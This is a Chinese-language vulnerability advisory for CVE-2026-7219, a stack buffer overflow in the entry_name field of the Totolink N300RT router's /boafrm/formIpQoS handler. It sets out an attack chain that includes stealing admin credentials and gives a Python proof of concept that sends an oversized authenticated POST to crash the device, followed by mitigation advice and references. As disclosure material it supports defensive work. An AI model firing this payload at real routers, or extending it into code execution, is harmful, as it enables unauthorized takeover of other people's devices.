CVE-2026-7219 Totolink N300RT缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-7219

漏洞类型

缓冲区溢出

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Totolink N300RT

漏洞概述

Totolink N300RT路由器固件版本3.4.0-B20250430存在高危缓冲区溢出漏洞。该漏洞位于/boafrm/formIpQoS接口处理逻辑中，未对entry_name参数进行严格边界检查。攻击者可构造特制数据包触发溢出，尽管需要高权限，但仍可能远程执行任意代码，完全控制设备，对网络机密性、完整性和可用性造成严重影响。

技术细节

该漏洞根因在于Totolink N300RT路由器固件中的Web管理界面使用了不安全的内存操作函数。在处理/boafrm/formIpQoS页面的QoS规则配置请求时，程序直接通过`strcpy`或类似函数将用户提供的`entry_name`参数值拷贝到栈上预先分配的固定长度缓冲区内。由于代码缺少必要的长度校验机制，当传入的数据长度超过缓冲区大小时，便会发生栈溢出。攻击者通过精心构造的恶意载荷，可以覆盖函数的返回地址或关键指针，从而劫持程序执行流。尽管CVSS向量要求高权限（PR:H），意味着攻击者通常需要先获取管理员凭证，但一旦利用成功，攻击者即可在设备上执行任意系统命令，获得最高控制权，进而植入后门或窃取网络流量。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别目标设备为Totolink N300RT路由器，并确定其固件版本为3.4.0-B20250430。

STEP 2

获取凭证

由于漏洞利用需要高权限（PR:H），攻击者通过暴力破解、钓鱼或利用其他弱口令漏洞获取Web管理界面的管理员账号密码。

STEP 3

构造Payload

攻击者编写Python脚本，构造针对`entry_name`参数的超长字符串，填充特定的返回地址和Shellcode。

STEP 4

发送恶意请求

攻击者携带管理员Cookie向`/boafrm/formIpQoS`接口发送POST请求，传递畸形的`entry_name`数据。

STEP 5

执行代码

设备在处理请求时发生缓冲区溢出，覆盖返回地址，攻击者获得设备的Shell权限，实现远程代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_ip = "192.168.1.1"
target_url = f"http://{target_ip}/boafrm/formIpQoS"

# Headers - Authentication is required (PR:H)
# Replace with valid cookie obtained after login
headers = {
    "User-Agent": "Mozilla/5.0",
    "Cookie": "uid=123412341234" 
}

# Buffer Overflow Payload
# Filling 'entry_name' with a large pattern to trigger the crash
# Offset needs to be adjusted based on specific firmware analysis
buffer = b"A" * 1000

# Form data structure typically used in these devices
payload_data = {
    "entry_name": buffer.decode('latin-1'),
    "submit-url": "/index.htm",
    "action": "Add"
}

try:
    print(f"Sending payload to {target_url}...")
    response = requests.post(target_url, headers=headers, data=payload_data, timeout=5)
    
    if response.status_code == 200:
        print("Request sent. Check if the device has crashed or telnet service is available.")
    else:
        print(f"Unexpected status code: {response.status_code}")
        
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

Totolink N300RT 3.4.0-B20250430

防御指南

临时缓解措施

在官方未发布修复补丁前，建议用户关闭路由器的远程Web管理功能，并将管理端口仅对本地网络开放。同时，定期检查路由器日志是否存在异常的访问记录或设备重启现象。如果条件允许，可将设备置于DMZ区域或通过ACL策略严格限制访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7219
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7219
3 Details https://www.cvedetails.com/cve/CVE-2026-7219/
4 VulDB https://vuldb.com/cve/CVE-2026-7219
5 Link https://github.com/xiaohaiyang-ai/IoT-Vulnerability-Research/tree/main/Vendors/TOTOLINK/N300RT/formIpQoS-Bof
6 Link https://vuldb.com/submit/808194
7 Link https://vuldb.com/vuln/359819
8 Link https://vuldb.com/vuln/359819/cti
9 Link https://www.totolink.net/